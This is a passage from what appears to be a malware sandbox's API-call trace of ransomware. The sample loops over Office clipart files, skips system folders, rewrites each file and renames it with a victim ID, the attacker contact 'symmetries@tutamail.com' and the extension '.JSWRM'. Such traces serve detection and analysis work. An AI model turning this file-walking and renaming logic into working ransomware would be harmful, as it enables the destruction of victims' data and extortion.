lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRID_01.MID", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRID_01.MID", lpUsedDefaultChar=0x0) returned 11 [0078.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRID_01.MID", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRID_01.MID", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRID_01.MID", lpUsedDefaultChar=0x0) returned 11 [0078.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0078.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0078.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.755] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6331) returned 1 [0078.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18b0) returned 0x205850 [0078.755] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x18b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x18b0, lpOverlapped=0x0) returned 1 [0078.759] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.759] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x18b0, lpOverlapped=0x0) returned 1 [0078.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0078.759] CloseHandle (hObject=0x314) returned 1 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0078.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0078.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0078.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0078.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0078.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.759] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0078.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0078.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0078.760] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00057_.WMF", cAlternateFileName="")) returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2=".") returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="..") returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="...") returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="windows") returned -1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="recovery") returned -1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="perflogs") returned -1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="documents and settings") returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="system volume information") returned -1 [0078.760] lstrcmpiW (lpString1="HH00057_.WMF", lpString2="msocache") returned -1 [0078.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0078.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00057_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00057_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00057_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0078.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0078.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00057_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00057_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00057_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0078.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0078.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.761] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3764) returned 1 [0078.761] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xeb0) returned 0x23fc98 [0078.761] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xeb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xeb0, lpOverlapped=0x0) returned 1 [0078.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.766] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xeb0, lpOverlapped=0x0) returned 1 [0078.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0078.766] CloseHandle (hObject=0x314) returned 1 [0078.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0078.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0078.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0078.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0078.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0078.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.767] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00084_.WMF", cAlternateFileName="")) returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2=".") returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="..") returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="...") returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="windows") returned -1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="recovery") returned -1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="perflogs") returned -1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="documents and settings") returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="system volume information") returned -1 [0078.768] lstrcmpiW (lpString1="HH00084_.WMF", lpString2="msocache") returned -1 [0078.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00084_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0078.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00084_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00084_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00084_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0078.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0078.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2472) returned 1 [0078.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a0) returned 0x20c6c0 [0078.769] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0078.774] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.774] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0078.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.774] CloseHandle (hObject=0x314) returned 1 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0078.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0078.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0078.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0078.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0078.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.774] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0078.775] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00231_.WMF", cAlternateFileName="")) returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2=".") returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="..") returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="...") returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="windows") returned -1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="recovery") returned -1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="perflogs") returned -1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="documents and settings") returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="system volume information") returned -1 [0078.775] lstrcmpiW (lpString1="HH00231_.WMF", lpString2="msocache") returned -1 [0078.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0078.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0078.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0078.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00231_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00231_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00231_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0078.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0078.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0078.776] 